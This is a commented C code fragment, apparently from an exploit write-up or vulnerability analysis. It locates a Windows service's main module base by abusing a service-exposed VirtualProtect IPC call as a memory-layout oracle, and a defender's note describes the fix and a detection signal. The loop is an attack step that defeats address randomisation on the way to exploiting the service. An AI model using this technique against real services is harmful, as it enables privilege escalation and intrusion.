// Fragment (not compilable as-is; the surrounding declarations and the
// definition of CommunicateServiceVirtualProtect are not shown): finds the base
// of the service's main module by probing its address space through what
// appears to be a service-exposed IPC wrapper around VirtualProtect.
//
// Assumed contract of CommunicateServiceVirtualProtect — not visible here,
// confirm against its definition: returns the previous page protection, or -1
// when the address is not a committed page.
//
// Defender's note: an IPC call that accepts a pid and applies a protection
// change inside the service's own process acts as a memory-layout oracle —
// the caller learns which pages exist and which are executable without ever
// reading memory. The fix on the service side is to refuse to act on its own
// pid (or any pid the client is not entitled to) and to never apply
// protection changes on behalf of an unprivileged client; a burst of
// protection changes at consecutive page addresses is also a usable
// detection signal.
pid = /*Locate the service's pid with the help of NtQuerySystemInformation*/;

// Walk the 32-bit user-mode range one 4 KiB page at a time.
for( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 )
{
    // Page is overwritten below as a loop-exit sentinel, so keep a copy of
    // the address whose protection has to be restored.
    Page_cp = Page;
    OldProtection = CommunicateServiceVirtualProtect(
        pid,                    //We give the service its own pid
        Page,                   //Address of the page in the service's process
        PAGE_EXECUTE_READWRITE, //Change to the most permissible protection to avoid crashes
        0x1000
    );
    if ( OldProtection == -1 ) //Invalid page
        continue;               // nothing was changed, so nothing to restore
    if ( OldProtection == PAGE_EXECUTE_READ )
    {
        //this is the main module's .text section
        // Heuristic: assumes the first PAGE_EXECUTE_READ page encountered is
        // the main module's .text and that the PE header occupies exactly the
        // one page before it — TODO confirm; any other EXECUTE_READ mapping
        // below the main module would yield a wrong Base.
        Base = Page - 0x1000;
        Page = 0x7fffefff; //to break after restoring the old protection
                           // (0x7fffefff + 0x1000 == 0x7fffffff, which fails
                           // the loop condition on the next iteration)
    }
    //restore the old protection
    CommunicateServiceVirtualProtect(
        pid,
        Page_cp,
        OldProtection,
        0x1000
    );
}
//Use the base to calculate the function address
// NOTE(review): if no PAGE_EXECUTE_READ page was found and Base was not
// initialised before this fragment, the line below uses an indeterminate
// value — confirm that the caller checks Base first.
pFunc = Base + FuncOffset;
//....